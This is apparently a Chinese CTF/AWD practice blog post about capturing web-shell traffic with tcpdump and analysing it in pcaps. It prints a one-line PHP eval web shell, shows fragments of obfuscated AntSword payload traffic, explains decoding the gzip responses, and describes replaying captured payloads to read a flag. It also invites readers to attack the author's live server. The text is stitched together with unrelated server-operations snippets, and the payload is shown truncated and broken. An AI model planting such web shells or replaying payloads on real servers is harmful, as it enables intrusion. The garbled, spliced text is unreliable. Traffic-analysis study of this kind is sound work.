用tcpdump抓包
tcpdump port 80 -w 1.pcap傳了乙個一句話木馬上去
<?php @eval($_post[value]);?>直接追蹤流,可以看到這個上傳的檔案
這個配置出了點小問題,影響不大。
用蟻劍連一下子,再抓一下流量,可以看到這個流量
/www/wwwroot/175.24.78.155/index.html&
value=@ini_set("display_errors", "0");
@set_time_limit(0);
function asenc($out)
;function asoutput()
ob_start();
tryelse
;}catch(exception $e)
;asoutput();
die();
1.pacp
這個返回包的gzip,是編碼過的,直接儲存為zip檔案再解密就能看到明文了。
把原始資料儲存,轉16進製制
接著把1f8b之前的刪掉,再解壓就可以了
3.pcap
這裡是抓取連線一句話木馬利用的資料報
像這樣的簡單的,直接拿過來用就可以了,理解也很好理解
但是想蟻劍那種,做了混淆的應該怎麼辦呢,我直接把payload copy下來
可以看到,直接成功
但是這個cat flag的包,經過嘗試,我並沒有成功,是因為路徑不一樣,蟻劍用的絕對路徑,在awd比賽的時候是不存在這種問題滴
不過包裡是有flag的
這裡面卻沒有。。。emmm應該問題不大
各位大佬,我環境是給計網老師搭的,現在還沒關,大佬們想日就日吧,求求別刪東西,我資料庫作業還在上面呢。又乖又慫.jpg
伺服器運維
運維 網際網路運維,通常屬於技術部門,與研發 測試 系統管理同為網際網路產品技術支撐的4大部門,這個劃分在國內和國外以及大小公司間都會多少有一些不同。產品的整個生命週期裡運維的職責重要而廣泛,但運維工程師們的職責不僅限於這部分工作,還需要總結工作中遇到的問題,抽取出相關的技術方向 研發相關的工具和平...
python運維伺服器
好久沒有寫東西了.一直做伺服器開發需要寫一些指令碼來控 務器的啟動.本來windows自帶了任務計畫,但不是特別方便,還是用python寫了一下.需求 在固定的時間啟動伺服器 先看源 def start process date cwd os.getcwd global list threads g...
伺服器運維簡介
一 認識伺服器 良知知彼才氣百戰不殆,假如對本身維護的伺服器都不相識,何故能正確辦理伺服器宕機 補丁安裝,裂痕修復等問題。1.伺服器操縱系統範例,版本,補丁版本 2.伺服器硬碟利用率 3.伺服器執行業務的環境 4.伺服器網路設定環境等。二 按期查抄 1.伺服器電源狀態查抄 2.伺服器電扇狀態查抄 3...